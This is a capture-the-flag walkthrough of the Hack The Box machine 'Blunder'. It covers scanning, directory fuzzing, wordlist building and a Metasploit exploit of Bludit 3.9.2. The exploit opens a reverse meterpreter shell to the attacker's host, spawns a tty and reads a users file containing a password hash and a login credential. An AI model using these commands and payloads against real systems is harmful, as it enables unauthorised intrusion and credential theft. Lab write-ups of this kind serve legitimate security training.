Blunder
Enumeration
nmap
$ nmap -sC -sV -oN nmap.txt 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST
Nmap scan report for 10.10.10.191
Host is up (0.066s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds
Apache httpd 2.4.41
dirsearch
$ ./dirsearch.py -u 10.10.10.191 -e *
21:28:51] 200 - 7KB - /0
[21:28:56] 200 - 3KB - /about
[21:28:58] 301 - 0B - /admin -> http://10.10.10.191/admin/
[21:29:00] 200 - 2KB - /admin/
[21:29:00] 200 - 2KB - /admin/.config
[21:29:00] 200 - 2KB - /admin/?/login
...
...
...
[21:29:03] 200 - 2KB - /admin/web/
[21:29:03] 200 - 2KB - /admin/user_count.txt
[21:29:03] 200 - 2KB - /admin/uploads.php
[21:29:31] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf
[21:29:42] 200 - 30B - /install.php
[21:29:45] 200 - 1KB - /LICENSE
[21:30:03] 200 - 3KB - /README.md
[21:30:04] 200 - 22B - /robots.txt
wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000003519: 200 1 L 4 W 22 Ch "robots"
000004125: 200 4 L 23 W 118 Ch "todo"
Potential username: fergus
After some extensive enumeration, the only usefull information found was the "todo.txt" file which contains a possible username ("fergus").
Creating wordlist with cewl
$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/
Bruteforcing login cred
Exploitation
Metasploit
$ msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS yes The password for Bludit
BLUDITUSER yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.17.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189
lhost => 10.10.14.189
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.189:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading BamMBogTOe.png...
[*] Uploading .htaccess...
[*] Executing BamMBogTOe.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100
[+] Deleted .htaccess
meterpreter > ls
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-08-16 22:52:22 +0100 thumbnails
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-05-26 09:29:29 +0100 hugo
40755/rwxr-xr-x 4096 dir 2020-04-28 12:13:35 +0100 shaun
PivEsc
$ meterpreter > shell
Process 3417 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c "import pty;pty.spawn('/bin/bash')"
$ www-data@blunder:/$ ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
$ www-data@blunder:/$ cd var
cd var
$ www-data@blunder:/var$ ls
ls
backups crash local log metrics run spool www
cache lib lock mail opt snap tmp
$ www-data@blunder:/var$ cd www
cd www
$ www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a bludit-3.9.2 html
$ www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
$ www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE bl-content bl-languages bl-themes install.php
README.md bl-kernel bl-plugins index.php
$ www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases pages tmp uploads workspaces
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
User: Hugo Pass: faca404fd5c0a31cf1897b823c695c85cffeb98d
Getting user.txt
Getting root.txt
Last updated
Was this helpful?